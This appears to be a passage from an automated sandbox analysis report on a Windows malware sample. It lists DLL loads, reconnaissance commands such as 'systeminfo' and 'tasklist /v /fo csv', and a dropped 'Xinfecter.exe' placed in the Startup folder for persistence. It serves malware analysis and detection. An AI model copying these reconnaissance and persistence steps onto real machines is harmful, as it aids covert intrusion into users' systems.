      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netapi32.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: samcli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: dsrole.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: xKvkNk9SXR.exeStatic file information: File size 1257984 > 1048576
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: xKvkNk9SXR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: xKvkNk9SXR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Unknown\source\repos\ConsoleApplication5_A\Release\ConsoleApplication5_A.pdb source: xKvkNk9SXR.exe, Xinfecter.exe.0.dr
      Source: xKvkNk9SXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: xKvkNk9SXR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
